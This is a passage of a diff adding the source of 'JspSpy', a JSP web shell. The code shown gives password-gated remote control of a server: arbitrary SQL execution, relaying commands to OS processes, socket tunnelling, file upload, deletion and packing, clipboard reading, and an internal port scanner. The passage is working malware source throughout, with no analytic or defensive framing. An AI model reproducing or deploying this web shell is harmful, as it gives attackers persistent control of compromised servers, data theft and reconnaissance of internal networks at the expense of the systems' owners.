+			this.conn = DriverManager.getConnection(url,uid,pwd);
+		}
+		public Object execute(String sql) throws Exception {
+			if (isValid()) {
+				stmt = conn.createStatement();
+				if (stmt.execute(sql)) {
+					return stmt.getResultSet();
+				} else {
+					return ""+stmt.getUpdateCount();
+				}
+			}
+			throw new Exception("Connection is inValid.");
+		}
+		public void closeStmt() throws Exception{
+			if (this.stmt != null)
+				stmt.close();
+		}
+		public boolean isValid() throws Exception {
+			return conn != null && !conn.isClosed();
+		}
+		public void close() throws Exception {
+			if (isValid()) {
+				closeStmt();
+				conn.close();
+			}
+		}
+		public boolean equals(Object o) {
+			if (o instanceof DBOperator) {
+				DBOperator dbo = (DBOperator)o;
+				return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
+			}
+			return false;
+		}
+		public Connection getConn(){
+			return this.conn;
+		}
+	}
+	private static class StreamConnector extends Thread {
+		private InputStream is;
+		private OutputStream os;  
+		public StreamConnector( InputStream is, OutputStream os ){
+			this.is = is;
+			this.os = os;
+		}			  
+		public void run(){
+			BufferedReader in  = null;
+			BufferedWriter out = null;
+			try{
+				in  = new BufferedReader( new InputStreamReader(this.is));
+				out = new BufferedWriter( new OutputStreamWriter(this.os));
+				char buffer[] = new char[8192];
+				int length;
+				while((length = in.read( buffer, 0, buffer.length ))>0){
+					out.write( buffer, 0, length );
+					out.flush();
+				}
+			} catch(Exception e){}
+				try{
+					if(in != null)
+						in.close();
+					if(out != null)
+						out.close();
+				} catch( Exception e ){}
+		}
+		public static void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){
+			new Thread(new Runnable(){
+				public void run(){
+					while (true) {
+						try{
+							byte[] data = new byte[100];
+							int len = localIn.read(data);
+							while (len != -1) {
+								remoteOut.write(data,0,len);
+								len = localIn.read(data);
+							}
+						}catch (Exception e) {
+							break;
+						}
+					}
+				}
+			}).start();
+		}
+		public static void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){
+			new Thread(new Runnable(){
+				public void run(){
+					while(true) {
+						try{
+							byte[] data = new byte[100];
+							int len = remoteIn.read(data);
+							while (len != -1) {
+								localOut.write(data,0,len);
+								len = remoteIn.read(data);
+							}
+						}catch (Exception e) {
+							try{
+								soc.close();
+								remoteSoc.close();
+							}catch(Exception ex) {
+							}
+							break;
+						}
+					}
+				}
+			}).start();
+		}
+	}
+	private static class EnterFile extends File{
+		private ZipFile zf = null;
+		private ZipEntry entry = null;
+		private boolean isDirectory = false;
+		private String absolutePath = null;
+		public void setEntry(ZipEntry e) {
+			this.entry = e;
+		}
+		public void setAbsolutePath(String p) {
+			this.absolutePath = p;
+		}
+		public void close() throws Exception{
+			this.zf.close();
+		}
+		public void setZf(String p) throws Exception{
+			if (p.toLowerCase().endsWith(".jar"))
+				this.zf = new JarFile(p);
+			else 
+				this.zf = new ZipFile(p);
+		}
+		public EnterFile(File parent, String child) {
+			super(parent,child);
+		}
+		public EnterFile(String pathname) {
+			super(pathname);
+		}
+		public EnterFile(String pathname,boolean isDir) {
+			this(pathname);
+			this.isDirectory = isDir;
+		}
+		public EnterFile(String parent, String child) {
+			super(parent,child);
+		}
+		public EnterFile(URI uri) {
+			super(uri);
+		}
+		public boolean exists(){
+			return new File(this.zf.getName()).exists();
+		}
+		public File[] listFiles()  {
+			java.util.List list = new ArrayList();
+			java.util.List handled = new ArrayList();
+			String currentDir = super.getPath();
+			currentDir = currentDir.replace('\\','/');
+			if (currentDir.indexOf("/") == 0)
+			{
+				if (currentDir.length() > 1)
+					currentDir = currentDir.substring(1);
+				else 
+					currentDir = "";
+			}
+			Enumeration e = this.zf.entries();
+			 while (e.hasMoreElements())
+			 {
+				 ZipEntry entry = (ZipEntry)e.nextElement();
+				String eName = entry.getName();
+				 if (this.zf instanceof JarFile) {
+					if (!entry.isDirectory()){
+						EnterFile ef = new EnterFile(eName);
+						ef.setEntry(entry);
+						try{
+							ef.setZf(this.zf.getName());
+						}catch(Exception ex) {
+						}
+						list.add(ef);
+					}
+				 } else {
+					 if (currentDir.equals("")) {
+						 //zip root directory
+						if (eName.indexOf("/") == -1 || eName.matches("[^/]+/$"))
+						{
+							EnterFile ef = new EnterFile(eName.replaceAll("/",""));
+							handled.add(eName.replaceAll("/",""));
+							ef.setEntry(entry);
+							list.add(ef);
+						} else {
+							if (eName.indexOf("/") != -1) {
+								String tmp = eName.substring(0,eName.indexOf("/"));
+								if (!handled.contains(tmp) && !Util.isEmpty(tmp)) {
+									EnterFile ef = new EnterFile(tmp,true);
+									ef.setEntry(entry);
+									list.add(ef);
+									handled.add(tmp);
+								}
+							}
+						}
+					 } else {
+						if (eName.startsWith(currentDir)) {
+							if (eName.matches(currentDir+"/[^/]+/?$")) {
+								//file.
+								EnterFile ef = new EnterFile(eName);
+								ef.setEntry(entry);
+								list.add(ef);
+								if (eName.endsWith("/")) {
+									String tmp = eName.substring(eName.lastIndexOf('/',eName.length()-2));
+									tmp = tmp.substring(1,tmp.length()-1);
+									handled.add(tmp);
+								}
+							} else {
+								//dir
+								try {
+									String tmp = eName.substring(currentDir.length()+1);
+									tmp = tmp.substring(0,tmp.indexOf('/'));
+									if (!handled.contains(tmp) && !Util.isEmpty(tmp)) {
+										EnterFile ef = new EnterFile(tmp,true);
+										ef.setAbsolutePath(currentDir+"/"+tmp);
+										ef.setEntry(entry);
+										list.add(ef);
+										handled.add(tmp);
+									}
+								} catch (Exception ex) {
+								}
+							}
+						}
+					 }
+				 }
+			 }
+			return  (File[])list.toArray(new File[0]);
+		}
+		public boolean isDirectory(){
+			return this.entry.isDirectory() || this.isDirectory;
+		}
+		public String getParent(){
+			return "";
+		}
+		public String getAbsolutePath(){
+			return absolutePath != null ? absolutePath : super.getPath();
+		}
+		public String getName(){
+			if (this.zf instanceof JarFile) {
+				return this.getAbsolutePath();
+			} else {
+				return super.getName();
+			}
+		}
+		public long lastModified(){
+			return entry.getTime();
+		}
+		public boolean canRead(){
+			return false;
+		}
+		public boolean canWrite(){
+			return false;
+		}
+		public boolean canExecute(){
+			return false;
+		}
+		public long length(){
+			return entry.getSize();
+		}
+	}
+	private static class OnLineProcess {
+		private String cmd = "first";
+		private Process pro;
+		public OnLineProcess(Process p){
+			this.pro = p;
+		}
+		public void setPro(Process p) {
+			this.pro = p;
+		}
+		public void setCmd(String c){
+			this.cmd = c;
+		}
+		public String getCmd(){
+			return this.cmd;
+		}
+		public Process getPro(){
+			return this.pro;
+		}
+		public void stop(){
+			this.pro.destroy();
+		}
+	}
+	private static class OnLineConnector extends Thread {
+			private OnLineProcess ol = null;
+			private InputStream is;
+			private OutputStream os;
+			private String name;
+			public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
+				this.is = is;
+				this.os = os;
+				this.name = name;
+				this.ol = ol;
+			}
+			public void run(){
+				BufferedReader in  = null;
+				BufferedWriter out = null;
+				try{
+					in  = new BufferedReader( new InputStreamReader(this.is));
+					out = new BufferedWriter( new OutputStreamWriter(this.os));
+					char buffer[] = new char[128];
+					if(this.name.equals("exeRclientO")) {
+						//from exe to client
+						int length = 0;
+						while((length = in.read( buffer, 0, buffer.length ))>0){
+							String str = new String(buffer, 0, length);
+							str = str.replaceAll("&","&amp;").replaceAll("<","&lt;").replaceAll(">","&gt;");
+							str = str.replaceAll(""+(char)13+(char)10,"<br/>");
+							str = str.replaceAll("\n","<br/>");
+							out.write(str.toCharArray(), 0, str.length());
+							out.flush();
+						}
+					} else {
+						//from client to exe
+						while(true) {
+							while(this.ol.getCmd() == null) {
+								Thread.sleep(500);
+							}
+							if (this.ol.getCmd().equals("first")) {
+								this.ol.setCmd(null);
+								continue;
+							}
+							this.ol.setCmd(this.ol.getCmd() + (char)10);
+							char[] arr = this.ol.getCmd().toCharArray();
+							out.write(arr,0,arr.length);
+							out.flush();
+							this.ol.setCmd(null);
+						}
+					}
+				} catch(Exception e){
+				}
+					try{
+						if(in != null)
+							in.close();
+						if(out != null)
+							out.close();
+					} catch( Exception e ){
+					}
+				}
+	}
+	private static class Table{
+		private ArrayList rows = null;
+		private boolean echoTableTag = false;
+		public void setEchoTableTag(boolean v) {
+			this.echoTableTag = v;
+		}
+		public Table(){
+			this.rows = new ArrayList();
+		}
+		public void addRow(Row r) {
+			this.rows.add(r);
+		}
+		public String toString(){
+			StringBuffer html = new StringBuffer();
+			if (echoTableTag)
+				html.append("<table>");
+			for (int i = 0;i<rows.size();i++) {
+				Row r=(Row)rows.get(i);
+				html.append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
+				ArrayList columns = r.getColumns();
+				for (int a = 0;a<columns.size();a++) {
+					Column c = (Column)columns.get(a);
+					html.append("<td nowrap>");
+					String vv = Util.htmlEncode(Util.getStr(c.getValue()));
+					if (vv.equals(""))
+						vv = "&nbsp;";
+					html.append(vv);
+					html.append("</td>");
+				}
+				html.append("</tr>");
+			}
+			if (echoTableTag)
+				html.append("</table>");
+			return html.toString();
+		}
+		public static String rs2Table(ResultSet rs,String sep,boolean op) throws Exception{
+			StringBuffer table = new StringBuffer();
+			ResultSetMetaData meta = rs.getMetaData();
+			int count = meta.getColumnCount();
+			if (!op)
+				table.append("<b style='color:red;margin-left:15px'><i> View Struct </i></b> - <a href=\"javascript:doPost({o:'executesql'})\">View All Tables</a><br/><br/>");
+			else 
+				table.append("<b style='color:red;margin-left:15px'><i> All Tables </i></b><br/><br/>");
+			table.append("<script>function view(t){document.getElementById('sql').value='select * from "+sep+"'+t+'"+sep+"';}</script>");
+			table.append("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
+			for (int i = 1;i<=count;i++) {
+				table.append("<td nowrap>"+meta.getColumnName(i)+"</td>");
+			}
+			if (op)
+				table.append("<td>&nbsp;</td>");
+			table.append("</tr>");
+			while (rs.next()) {
+				String tbName = null;
+				table.append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
+				for (int i = 1;i<=count;i++) {
+					String v = rs.getString(i);
+					if (i == 3)
+						tbName = v;
+					table.append("<td nowrap>"+Util.null2Nbsp(v)+"</td>");
+				}
+				if (op)
+					table.append("<td nowrap> <a href=\"#\" onclick=\"view('"+tbName+"')\">View</a> | <a href=\"javascript:doPost({o:'executesql',type:'struct',table:'"+tbName+"'})\">Struct</a> | <a href=\"javascript:doPost({o:'export',table:'"+tbName+"'})\">Export </a> | <a href=\"javascript:doPost({o:'vExport',table:'"+tbName+"'})\">Save To File</a> </td>");
+				table.append("</tr>");
+			}
+			table.append("</table><br/>");
+			return table.toString();
+		}
+	}
+	private static class Row{
+		private ArrayList cols = null;
+		public Row(){
+			this.cols = new ArrayList();
+		}
+		public void addColumn(Column n) {
+			this.cols.add(n);
+		}
+		public ArrayList getColumns(){
+			return this.cols;
+		}
+	}
+	private static class Column{
+		private String value;
+		public Column(String v){
+			this.value = v;
+		}
+		public String getValue(){
+			return this.value;
+		}
+	}
+	private static class Util{
+		public static boolean isEmpty(String s) {
+			return s == null || s.trim().equals("");
+		}
+		public static boolean isEmpty(Object o) {
+			return o == null || isEmpty(o.toString());
+		}
+		public static String getSize(long size,char danwei) {
+			if (danwei == 'M') {
+				double v =  formatNumber(size / 1024.0 / 1024.0,2);
+				if (v > 1024) {
+					return getSize(size,'G');
+				}else {
+					return v + "M";
+				}
+			} else if (danwei == 'G') {
+				return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G";
+			} else if (danwei == 'K') {
+				double v = formatNumber(size / 1024.0,2);
+				if (v > 1024) {
+					return getSize(size,'M');
+				} else {
+					return v + "K";
+				}
+			} else if (danwei == 'B') {
+				if (size > 1024) {
+					return getSize(size,'K');
+				}else {
+					return size + "B";
+				}
+			}
+			return ""+0+danwei;
+		}
+		public static boolean exists(String[] arr,String v) {
+			for (int i =0;i<arr.length;i++) {
+				if (v.equals(arr[i])) {
+					return true;
+				}
+			}
+			return false;
+		}
+		public static double formatNumber(double value,int l) {
+			NumberFormat format = NumberFormat.getInstance();
+				format.setMaximumFractionDigits(l);
+				format.setGroupingUsed(false);
+			   return new Double(format.format(value)).doubleValue();
+		}
+		public static boolean isInteger(String v) {
+			if (isEmpty(v))
+				return false;
+			return v.matches("^\\d+$");
+		}
+		public static String formatDate(long time) {
+			SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
+			return format.format(new java.util.Date(time));
+		}
+		public static String convertPath(String path) {
+			return path != null ? path.replace('\\','/') : "";
+		}
+		public static String htmlEncode(String v) {
+			if (isEmpty(v))
+				return "";
+			return v.replaceAll("&","&amp;").replaceAll("<","&lt;").replaceAll(">","&gt;");
+		}
+		public static String getStr(String s) {
+			return s == null ? "" :s;
+		}
+		public static String null2Nbsp(String s) {
+			if (s == null)
+				s = "&nbsp;";
+			return s;
+		}
+		public static String getStr(Object s) {
+			return s == null ? "" :s.toString();
+		}
+		public static String exec(String regex, String str, int group) {
+			Pattern pat = Pattern.compile(regex);
+			Matcher m = pat.matcher(str);
+			if (m.find())
+				return m.group(group);
+			return null;
+		}
+		public static void outMsg(Writer out,String msg) throws Exception {
+			outMsg(out,msg,"center");
+		}
+		public static void outMsg(Writer out,String msg,String align) throws Exception {
+			out.write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"+align+";font-weight:bold;margin:10px\">"+msg+"</div>");
+		}
+		public static String highLight(String str) {
+			str = str.replaceAll("\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b","<span style='color:blue'>$1</span>");
+			str = str.replaceAll("\t(//.+)","\t<span style='color:green'>$1</span>");
+			return str;
+		}
+	}
+	private static class UploadBean {
+		private String fileName = null;
+		private String suffix = null;
+		private String savePath = "";
+		private ServletInputStream sis = null;
+		private OutputStream targetOutput = null;
+		private byte[] b = new byte[1024];
+		public void setTargetOutput(OutputStream stream) {
+			this.targetOutput = stream;
+		}
+		public UploadBean() {
+		}
+		public void setSavePath(String path) {
+			this.savePath = path;
+		}
+		public String getFileName(){
+			return this.fileName;
+		}
+		public void parseRequest(HttpServletRequest request) throws IOException {
+			  sis = request.getInputStream();
+			  int a = 0;
+			  int k = 0;
+			  String s = "";
+			  while ((a = sis.readLine(b,0,b.length))!= -1) {
+				s = new String(b, 0, a,PAGE_CHARSET);
+				 if ((k = s.indexOf("filename=\""))!= -1) {
+					s = s.substring(k + 10);
+					k = s.indexOf("\"");
+					s = s.substring(0, k);
+					File tF = new File(s);
+					if (tF.isAbsolute()) {
+						fileName = tF.getName();
+					} else {
+						fileName = s;
+					}
+					k = s.lastIndexOf(".");
+					suffix = s.substring(k + 1);
+					upload();
+				 }
+			  }
+		}
+		private void upload() throws IOException{
+			try {
+					OutputStream out = null;
+					if (this.targetOutput != null) 
+						out = this.targetOutput;
+					else 
+						out = new FileOutputStream(new File(savePath,fileName));
+					 int a = 0;
+					 int k = 0;
+					 String s = "";
+					 while ((a = sis.readLine(b,0,b.length))!=-1) {
+						s = new String(b, 0, a);
+						if ((k = s.indexOf("Content-Type:"))!=-1) {
+						  break;
+						}
+					}
+					sis.readLine(b,0,b.length);
+					while ((a = sis.readLine(b,0,b.length)) != -1) {
+						s = new String(b, 0, a);
+						if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
+						  break;
+						}
+						out.write(b, 0, a);
+					}
+					if (out instanceof FileOutputStream)
+						out.close();
+				} catch (IOException ioe) {
+					throw ioe;
+				}
+		}
+	}
+%>
+<%
+	SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1);
+	String myAbsolutePath = application.getRealPath(request.getServletPath());
+	if (Util.isEmpty(myAbsolutePath)) {//for weblogic
+		SHELL_NAME = request.getServletPath();
+		myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString();
+		SHELL_NAME=request.getContextPath()+SHELL_NAME;
+		WEB_ROOT = new File(application.getResource("/").getPath()).toString();
+	} else {
+		WEB_ROOT = application.getRealPath("/");
+	}
+	SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator)));
+	if (SHELL_DIR.indexOf('/') == 0)
+		ISLINUX = true;
+	else
+		ISLINUX = false;
+	if (session.getAttribute(CURRENT_DIR) == null)
+		session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR));
+	request = new MyRequest(request);
+	if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
+		String o = request.getParameter("o");
+		if (o != null &&  o.equals("login")) {
+			((Invoker)ins.get("login")).invoke(request,response,session);
+			return;
+		} else if (o != null && o.equals("vLogin")) {
+			((Invoker)ins.get("vLogin")).invoke(request,response,session);
+			return;
+		} else {
+			((Invoker)ins.get("vLogin")).invoke(request,response,session);
+			return;
+		}
+ 	}
+%>
+<%!
+	private static interface Invoker {
+		public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception;
+		public boolean doBefore();
+		public boolean doAfter();
+	}
+	private static class DefaultInvoker implements Invoker{
+		public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+		}
+		public boolean doBefore(){
+			return true;
+		}
+		public boolean doAfter() {
+			return true;
+		}
+	}
+	private static class ScriptInvoker extends DefaultInvoker{
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					out.println("<script type=\"text/javascript\">"+
+					"	String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};"+
+					"	function fso(obj) {"+
+					"		this.currentDir = '"+JSession.getAttribute(CURRENT_DIR)+"';"+
+					"		this.filename = obj.filename;"+
+					"		this.path = obj.path;"+
+					"		this.filetype = obj.filetype;"+
+					"		this.charset = obj.charset;"+
+					"	};"+
+					"	fso.prototype = {"+
+					"		copy:function(){"+
+					"			var path = prompt('Copy To : ',this.path);"+
+					"			if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
+					"			doPost({o:'copy',src:this.path,to:path});"+
+					"		},"+
+					"		move:function() {"+
+					"			var path =prompt('Move To : ',this.path);"+
+					"			if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
+					"			doPost({o:'move',src:this.path,to:path})"+
+					"		},"+
+					"		vEdit:function() {"+
+					"			if (!this.charset)"+
+					"				doPost({o:'vEdit',filepath:this.path});"+
+					"			else"+
+					"				doPost({o:'vEdit',filepath:this.path,charset:this.charset});"+
+					"		},"+
+					"		down:function() {"+
+					"			doPost({o:'down',path:this.path})"+
+					"		},"+
+					"		removedir:function() {"+
+					"			if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;"+
+					"			doPost({o:'removedir',dir:this.path});"+
+					"		},"+
+					"		mkdir:function() {"+
+					"			var name = prompt('Input New Directory Name','');"+
+					"			if (name == null || name.trim().length == 0)return;"+
+					"			doPost({o:'mkdir',name:name});"+
+					"		},"+
+					"		subdir:function(out) {"+
+					"			doPost({o:'filelist',folder:this.path,outentry:(out || 'none')})"+
+					"		},"+
+					"		parent:function() {"+
+					"			var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';"+
+					"			doPost({o:'filelist',folder:parent})"+
+					"		},"+
+					"		createFile:function() {"+
+					"			var path = prompt('Input New File Name','');"+
+					"			if (path == null || path.trim().length == 0) return;"+
+					"			doPost({o:'vCreateFile',filepath:path})"+
+					"		},"+
+					"		deleteBatch:function() {"+
+					"			if (!confirm('Are You Sure To Delete These Files?')) return;"+
+					"			var selected = new Array();"+
+					"			var inputs = document.getElementsByTagName('input');"+
+					"			for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
+					"			if (selected.length == 0) {alert('No File Selected');return;}"+
+					"			doPost({o:'deleteBatch',files:selected.join(',')})"+
+					"		},"+
+					"		packBatch:function() {"+
+					"			var selected = new Array();"+
+					"			var inputs = document.getElementsByTagName('input');"+
+					"			for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
+					"			if (selected.length == 0) {alert('No File Selected');return;}"+
+					"			var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');"+
+					"			if (savefilename == null || savefilename.trim().length == 0)return;"+
+					"			doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})"+
+					"		},"+
+					"		pack:function(showconfig) {"+
+					"			if (showconfig && confirm('Need Pack Configuration?')) {doPost({o:'vPack',packedfile:this.path});return;}"+
+					"			var tmpName = '';"+
+					"			if (this.filename.indexOf('.') == -1) tmpName = this.filename;"+
+					"			else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));"+
+					"			tmpName += '.zip';"+
+					"			var path = this.path;"+
+					"			var name = prompt('Input Target File Name (Only Support Zip)',tmpName);"+
+					"			if (name == null || path.trim().length == 0) return;"+
+					"			doPost({o:'pack',packedfile:path,savefilename:name})"+
+					"		},"+
+					"		vEditProperty:function() {"+
+					"			var path = this.path;"+
+					"			doPost({o:'vEditProperty',filepath:path})"+
+					"		},"+
+					"		unpack:function() {"+
+					"			var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));"+
+					"			if (path == null || path.trim().length == 0) return;"+
+					"			doPost({o:'unpack',savepath:path,zipfile:this.path})"+
+					"		},"+
+					"		enter:function() {"+
+					"			doPost({o:'enter',filepath:this.path})"+
+					"		}"+
+					"	};"+
+					"	function doPost(obj) {"+
+					"		var form = document.forms[\"doForm\"];"+
+					"		var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}"+
+					"		for (var pro in obj)"+
+					"		{"+
+					"			var input = document.createElement(\"input\");"+
+					"			input.type = \"hidden\";"+
+					"			input.name = pro;"+
+					"			input.value = obj[pro];"+
+					"			form.appendChild(input);"+
+					"		}"+
+					"		form.submit();"+
+					"	}"+
+					"</script>");	
+					
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class BeforeInvoker extends  DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					out.println("<html><head><title>JspSpy Private Codz By - Ninty</title><style type=\"text/css\">"+
+					"body,td{font: 12px Arial,Tahoma;line-height: 16px;}"+
+					".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}"+
+					".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}"+
+					".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}"+
+					"a {color: #00f;text-decoration:underline;}"+
+					"a:hover{color: #f00;text-decoration:none;}"+
+					".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}"+
+					".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}"+
+					".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}"+
+					".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}"+
+					".head td span{font-weight:normal;}"+
+					"form{margin:0;padding:0;}"+
+					"h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}"+
+					"ul.info li{margin:0;color:#444;line-height:24px;height:24px;}"+
+					"u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}"+
+					".secho{height:400px;width:100%;overflow:auto;border:none}"+
+					"hr{border: 1px solid rgb(221, 221, 221); height: 0px;}"+
+					"</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class AfterInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					out.println("</body></html>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class DeleteBatchInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String files = request.getParameter("files");
+					int success = 0;
+					int failed = 0;
+					if (!Util.isEmpty(files)) {
+						String currentDir = JSession.getAttribute(CURRENT_DIR).toString();
+						String[] arr = files.split(",");
+						for (int i = 0;i<arr.length;i++) {
+							String fs = arr[i];
+							File f = new File(currentDir,fs);
+							if(f.delete())
+								success += 1;
+							else
+								failed += 1;
+						}
+					}
+					JSession.setAttribute(MSG,success+" Files Deleted <span style='color:green'>Success</span> , "+failed+" Files Deleted <span style='color:red'>Failed</span>!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class ClipBoardInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+					"  <tr>"+
+					"    <td>"+
+					"        <h2>System Clipboard &raquo;</h2>"+
+					"<p><pre>");
+					try{
+						out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getContents(DataFlavor.stringFlavor).getTransferData(DataFlavor.stringFlavor))));
+					}catch (Exception ex) {
+						out.println("ClipBoard is Empty Or Is Not Text Data !");
+					}
+					out.println("</pre>"+
+					"          <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\"  />"+
+					"        </p>"+
+					"      </td>"+
+					"  </tr>"+
+					"</table>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class VPortScanInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String ip = request.getParameter("ip");
+					String ports = request.getParameter("ports");
+					String timeout = request.getParameter("timeout");
+					String banner = request.getParameter("banner");
+					if (Util.isEmpty(ip))
+						ip = "127.0.0.1";
+					if (Util.isEmpty(ports))
+						ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
+					if (Util.isEmpty(timeout)) 
+						timeout = "2";
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+					"<h2 id=\"Bin_H2_Title\">PortScan &gt;&gt;</h2>"+
+					"<div id=\"YwLB\"><form action=\""+SHELL_NAME+"\" method=\"post\">"+
+					"<p><input type=\"hidden\" value=\"portScan\" name=\"o\">"+
+					"IP : <input name=\"ip\" type=\"text\" value=\""+ip+"\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\""+ports+"\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> <input "+(!Util.isEmpty(banner) ? "checked" : "")+" type='checkbox' value='yes' name='banner'/>Banner Timeout  (Second) : <input name=\"timeout\" type=\"text\" value=\""+timeout+"\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"+
+					"</p>"+
+					"</form></div>"+
+					"</td></tr></table>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class PortScanInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					((Invoker)ins.get("vPortScan")).invoke(request,response,JSession);
+					out.println("<hr/>");
+					String ip = request.getParameter("ip");
+					String ports = request.getParameter("ports");
+					String timeout = request.getParameter("timeout");
+					String banner = request.getParameter("banner");
+					int iTimeout = 0;
+					if (Util.isEmpty(ip) || Util.isEmpty(ports))
+						return;
+					if (!Util.isInteger(timeout)) {
+						timeout = "2";
+					}
+					iTimeout = Integer.parseInt(timeout);
+					Map rs = new LinkedHashMap();
+					String[] portArr = ports.split(",");
+					for (int i =0;i<portArr.length;i++) {
+						String port = portArr[i];
+						BufferedReader r = null;
+						try {
+							Socket s = new Socket();
+							s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout);
+							s.setSoTimeout(iTimeout);
+							if (!Util.isEmpty(banner)) {
+								r = new BufferedReader(new InputStreamReader(s.getInputStream()));
+								StringBuffer sb = new StringBuffer();
+								String b = r.readLine();
+								while (b != null) {
+									sb.append(b+" ");
+									try {
+										b = r.readLine();
+									} catch (Exception e) {
+										break;
+									}
+								}
+								rs.put(port,"Open <span style=\"color:grey;font-weight:normal\">"+sb.toString()+"</span>");
+								r.close();
+							} else {
+								rs.put(port,"Open");
+							}
+							s.close();
+						} catch (Exception e) {
+							if (e.toString().toLowerCase().indexOf("read timed out")!=-1) {
+								rs.put(port,"Open <span style=\"color:grey;font-weight:normal\">&lt;&lt;No Banner!&gt;&gt;</span>");
+								if (r != null)
+									r.close();
+							} else {
+								rs.put(port,"Close");
+							}
+						}
+					}
+					out.println("<div style='margin:10px'>");
+					Set entrySet = rs.entrySet();
+					Iterator it =  entrySet.iterator();
+					while (it.hasNext()) {
